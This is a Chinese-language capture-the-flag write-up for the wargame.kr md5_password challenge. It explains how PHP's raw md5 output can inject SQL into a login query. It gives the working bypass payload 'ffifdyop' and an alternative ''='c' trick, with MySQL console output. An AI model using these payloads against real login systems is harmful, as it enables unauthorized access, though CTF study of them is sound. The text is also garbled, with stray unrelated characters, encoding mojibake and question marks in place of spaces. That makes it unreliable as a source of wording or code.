http://wargame.kr:8080/md5_password/index.php
關(guān)鍵源碼
$ps=mysql_real_escape_string($_POST['ps']);
$row=@mysql_fetch_array(mysql_query("select?*?from?admin_password?where?password='".md5($ps,true)."'"));
這里注意md5函數(shù)還帶了參數(shù)true涯鲁。語(yǔ)法:
md5(string,raw)
參數(shù)描述
string必需壁公。規(guī)定要計(jì)算的字符串工三。
raw可選汞窗。規(guī)定十六進(jìn)制或二進(jìn)制輸出格式:
TRUE - 原始 16 字符二進(jìn)制格式
FALSE - 默認(rèn)损姜。32 字符十六進(jìn)制數(shù)
所以如果某個(gè)payload的md5取二進(jìn)制之后的值是 口口' or '1口口 就會(huì)使得select * from admin_password where password='口口' or '1口口' ?星爪。注意or 最后可以1或2或3等數(shù)字開(kāi)頭坠宴,MySQL會(huì)將其處理為數(shù)字類(lèi)型。
那么經(jīng)典的這樣的payload 就是ffifdyop 聋亡,其md5 二進(jìn)制后內(nèi)容是 ?'or'6?]??
----------------
還有另外一種解法是肘习,尋找一個(gè)payload 包含'=' ? 使得構(gòu)造select * from admin_password where password=''='c' ? ? ?。解釋一下 password='' 得到0 坡倔,然后0='c' 因?yàn)镸ySQL將'c'看做數(shù)字類(lèi)型于是判斷布爾成立漂佩。
mysql> select * from users where password =''='';
+-------+----------+
| name? | password |
+-------+----------+
| guest | guest? ? |
+-------+----------+
1 row in set (0.00 sec)
mysql> select * from users where password =''='c';
+-------+----------+
| name? | password |
+-------+----------+
| guest | guest? ? |
+-------+----------+
1 row in set, 1 warning (0.00 sec)
mysql> select * from users where password =''='1';
Empty set (0.00 sec)
http://mslc.ctf.su/wp/leet-more-2010-oh-those-admins-writeup/
